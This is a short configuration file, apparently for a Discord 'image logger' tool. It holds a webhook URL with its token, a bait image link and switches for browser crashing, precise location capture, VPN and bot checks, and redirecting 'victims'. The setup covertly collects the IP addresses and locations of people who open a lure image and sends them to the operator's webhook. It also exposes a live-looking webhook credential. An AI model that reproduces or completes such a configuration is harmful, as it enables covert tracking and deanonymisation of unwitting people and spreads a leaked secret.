Your Discord Webhook URL
DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/1537776779782266890/f-rfkCenvtgrs_31zHFCJ-l99naikMJTbWiYt2D2CFKLJiGTHkrJr7olJP3OIJoS-vSI

Custom image to use for the logger
DEFAULT_IMAGE=https://i.pinimg.com/736x/3c/10/b7/3c10b73b5f71be630609f5713a9b0521.jpg

Change the bot name
BOT_USERNAME=Logger

Features (Set to true or false)
CRASH_BROWSER=false
ACCURATE_LOCATION=false
VPN_CHECK_LEVEL=1
LINK_ALERTS=true
BUGGED_IMAGE=true
ANTI_BOT_LEVEL=1

Where to redirect victims (Leave empty for no redirect)
REDIRECT_URL=""
CUSTOM_MESSAGE=""
